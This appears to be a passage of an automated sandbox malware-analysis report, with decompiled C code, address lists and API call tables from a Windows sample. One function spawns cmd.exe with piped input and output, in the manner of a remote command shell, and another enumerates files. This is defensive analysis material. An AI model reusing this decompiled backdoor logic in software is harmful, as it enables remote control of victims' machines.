					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v64, _t102, _t102, 0x41bfb8, "\\", E00412795( &_v208, E0040180C( &_v48, _t205, 1)));
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v6);
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t106 = E00412DDF( &_v32,  &_v32);
					_t206 = _t106;
					if(_t106 != 0) {
						_t107 = E0040180C(0x41bcb0, _t206, 0x1b);
						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						_t207 =  *_t107 - 1;
						if( *_t107 == 1) {
							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							_t118 = E00402F9B( &_v1296, _t107, _t107);
							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040309E( &_v1296,  &_v144, _t118, _t118));
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						_t112 =  &_v128;
						L00414140();
						_t113 =  &_v112;
						L00414140();
						_t114 =  &_v240;
						L00414140();
						_t115 =  &_v176;
						L00414140();
						_t116 =  &_v272;
						L00414140();
						L00414140();
						E004020C2(0x41bf70, 0x5e, _t195 - 0x10);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t116, _t116, _t115, _t115, _t114, _t114, _t113, _t113, _t112, _t112, E0040180C( &_v48, _t207, 1), 0x41b310, E0040180C( &_v48, _t207, 0), 0x41b310, E0040180C( &_v48, _t207, 2), 0x41b310,  &_v32);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				goto L16;
			}




















































                                  0x00410595
                                  0x0041059b
                                  0x004105ad
                                  0x004105be
                                  0x004105cd
                                  0x004105d7
                                  0x004105dc
                                  0x004105df
                                  0x004105e2
                                  0x004107c2
                                  0x004107d6
                                  0x004107e8
                                  0x004107ef
                                  0x004107f5
                                  0x004107f8
                                  0x004107fb
                                  0x004108f3
                                  0x004108fc
                                  0x00410909
                                  0x00410911
                                  0x0041091a
                                  0x00410920
                                  0x00410923
                                  0x0041092b
                                  0x00410934
                                  0x0041093e
                                  0x0041093e
                                  0x0041080a
                                  0x00410817
                                  0x0041081d
                                  0x00410824
                                  0x00410830
                                  0x00410836
                                  0x00410838
                                  0x00410844
                                  0x00410850
                                  0x0041085a
                                  0x00410866
                                  0x00410866
                                  0x0041087c
                                  0x0041087c
                                  0x0041087e
                                  0x00410880
                                  0x00000000
                                  0x00000000
                                  0x0041088b
                                  0x00410898
                                  0x0041089f
                                  0x004108ab
                                  0x004108b1
                                  0x004108b3
                                  0x004108bf
                                  0x004108cb
                                  0x004108d5
                                  0x004108e1
                                  0x004108e1
                                  0x0041087c
                                  0x0041087c
                                  0x00000000
                                  0x0041087c
                                  0x004105e8
                                  0x004105e9
                                  0x0041060e
                                  0x00410617
                                  0x00410624
                                  0x00410629
                                  0x0041062f
                                  0x0041063b
                                  0x00410648
                                  0x00410655
                                  0x0041065c
                                  0x00410662
                                  0x00410665
                                  0x00410672
                                  0x00410679
                                  0x0041067f
                                  0x00410682
                                  0x0041068b
                                  0x00410694
                                  0x004106a1
                                  0x004106a9
                                  0x004106b3
                                  0x004106d0
                                  0x004106dc
                                  0x004106dc
                                  0x0041070f
                                  0x00410713
                                  0x0041071c
                                  0x00410720
                                  0x00410729
                                  0x00410730
                                  0x00410739
                                  0x00410740
                                  0x00410749
                                  0x00410750
                                  0x0041075a
                                  0x00410769
                                  0x00410774
                                  0x00410780
                                  0x0041078c
                                  0x00410795
                                  0x0041079e
                                  0x0041079e
                                  0x004107a7
                                  0x004107b0
                                  0x004107b0
                                  0x00000000

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 004105AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                  • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                  • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                  • String ID:
                                  • API String ID: 2968164691-0
                                  • Opcode ID: 718ddcdb58c9dca260901cbdca20190fc0c08979b4ccda9be22cf8766a527973
                                  • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                  • Opcode Fuzzy Hash: 718ddcdb58c9dca260901cbdca20190fc0c08979b4ccda9be22cf8766a527973
                                  • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402B8A Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 291pipesleepfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00402B8A(char _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				void _v16;
				signed int _v20;
				long _v24;
				long _v28;
				void* _v44;
				char _v60;
				char _v76;
				char* _t54;
				int _t68;
				void* _t79;
				CHAR* _t80;
				int _t91;
				signed int _t120;
				void* _t136;
				CHAR* _t142;
				void* _t146;

				if(( *0x41b85c & 0x00000001) != 0) {
					_t142 = 0;
				} else {
					 *0x41b85c =  *0x41b85c | 0x00000001;
					_t142 = 0;
					E00402010(0x41b800, 0);
					E00413E72(E00402F89);
				}
				if(( *0x41b85c & 0x00000002) == 0) {
					 *0x41b85c =  *0x41b85c | 0x00000002;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00402F7E);
				}
				_t50 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
				_v20 = _v20 | 0xffffffff;
				_v16 = _t142;
				if( *0x41b888 != 0) {
					L12:
					_v24 = _t142;
					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
					if(_v24 <= _t142) {
						_t146 = _t146 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
						_v20 = _t54;
					} else {
						_t136 = malloc(_v24);
						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
						if(_v28 > _t142) {
							if(_v16 <= _t142) {
								L18:
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
								_t146 = _t146 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
								_v20 = _t54;
							} else {
								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
								_t68 = strncmp(_t136, _t54, _v16);
								_t146 = _t146 + 0xc;
								if(_t68 != 0) {
									goto L18;
								} else {
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
									_t146 = _t146 - 0x10;
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
									_v20 = _t54;
								}
							}
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						free(_t136);
					}
					goto L22;
				} else {
					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
					if(_t50 == 0) {
						L11:
						if( *0x41b888 != 0) {
							do {
								goto L12;
								L22:
								if(_v20 == 0xffffffff) {
									 *0x41b889 =  *0x41b889 & 0x00000000;
								}
								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
								if(_t54 <= 0) {
									_v16 = _t142;
								} else {
									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
								}
								Sleep(0x64);
							} while ( *0x41b889 != 0);
							TerminateProcess(0x41b878->hProcess, _t142);
							CloseHandle( *0x41b87c);
							_t50 = CloseHandle( *0x41b878);
						}
						E004020F4(_t50, 0x41b800);
						CloseHandle( *0x41b858);
						CloseHandle( *0x41b874);
						 *0x41b888 =  *0x41b888 & 0x00000000;
						_t91 = 1;
					} else {
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
						0x41b7f0->nLength = 0xc;
						 *0x41b7f8 = 1;
						 *0x41b7f4 = _t142;
						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
							_t91 = 0;
						} else {
							_t120 = 0x11;
							memset(0x41b7a8, 0, _t120 << 2);
							_t79 =  *0x41b7a0; // 0x0
							 *0x41b7e0 = _t79;
							_t80 =  *0x41b874; // 0x0
							0x41b7a8->cb = 0x44;
							 *0x41b7d4 = 0x101;
							 *0x41b7d8 = _t142;
							 *0x41b7e4 = _t80;
							 *0x41b7e8 = _t80;
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
							 *0x41b889 = 1;
							E00402038(0x41b800);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E0040209B(0x41b800, 0x415664);
							_t146 = _t146 + 0xc;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
							Sleep(0x12c);
							_t142 = 0;
							goto L11;
						}
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t91;
			}
























                                  0x00402b9f
                                  0x00402bbf
                                  0x00402ba1
                                  0x00402ba1
                                  0x00402ba8
                                  0x00402bad
                                  0x00402bb7
                                  0x00402bbc
                                  0x00402bc8
                                  0x00402bca
                                  0x00402bdc
                                  0x00402be7
                                  0x00402bec
                                  0x00402bf4
                                  0x00402bfb
                                  0x00402c01
                                  0x00402c0c
                                  0x00402c0f
                                  0x00402d86
                                  0x00402d94
                                  0x00402d97
                                  0x00402da0
                                  0x00402e77
                                  0x00402e85
                                  0x00402e8f
                                  0x00402e94
                                  0x00402da6
                                  0x00402db0
                                  0x00402dc1
                                  0x00402dca
                                  0x00402dd3
                                  0x00402e33
                                  0x00402e3b
                                  0x00402e41
                                  0x00402e52
                                  0x00402e5c
                                  0x00402e61
                                  0x00402dd5
                                  0x00402ddb
                                  0x00402de3
                                  0x00402de9
                                  0x00402dee
                                  0x00000000
                                  0x00402df0
                                  0x00402df8
                                  0x00402dfe
                                  0x00402e15
                                  0x00402e1f
                                  0x00402e24
                                  0x00402e27
                                  0x00402dee
                                  0x00402e67
                                  0x00402e67
                                  0x00402e6e
                                  0x00402e74
                                  0x00000000
                                  0x00402c15
                                  0x00402c1f
                                  0x00402c29
                                  0x00402d79
                                  0x00402d80
                                  0x00402d86
                                  0x00000000
                                  0x00402e97
                                  0x00402e9b
                                  0x00402e9d
                                  0x00402e9d
                                  0x00402eab
                                  0x00402eb3
                                  0x00402f02
                                  0x00402eb5
                                  0x00402ebc
                                  0x00402eca
                                  0x00402ed7
                                  0x00402ee0
                                  0x00402eed
                                  0x00402efa
                                  0x00402efa
                                  0x00402f07
                                  0x00402f0d
                                  0x00402f21
                                  0x00402f33
                                  0x00402f3b
                                  0x00402f3b
                                  0x00402f47
                                  0x00402f52
                                  0x00402f5a
                                  0x00402f5c
                                  0x00402f63
                                  0x00402c2f
                                  0x00402c3e
                                  0x00402c4b
                                  0x00402c67
                                  0x00402c71
                                  0x00402c7b
                                  0x00402c85
                                  0x00402e2c
                                  0x00402ca5
                                  0x00402cac
                                  0x00402cb6
                                  0x00402cb8
                                  0x00402cbe
                                  0x00402cc3
                                  0x00402ccd
                                  0x00402cd7
                                  0x00402ce1
                                  0x00402ce8
                                  0x00402ced
                                  0x00402cf2
                                  0x00402d06
                                  0x00402d20
                                  0x00402d25
                                  0x00402d2d
                                  0x00402d34
                                  0x00402d45
                                  0x00402d46
                                  0x00402d47
                                  0x00402d48
                                  0x00402d49
                                  0x00402d4e
                                  0x00402d57
                                  0x00402d6e
                                  0x00402d71
                                  0x00402d77
                                  0x00000000
                                  0x00402d77
                                  0x00402c85
                                  0x00402c29
                                  0x00402f68
                                  0x00402f71
                                  0x00402f7d

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
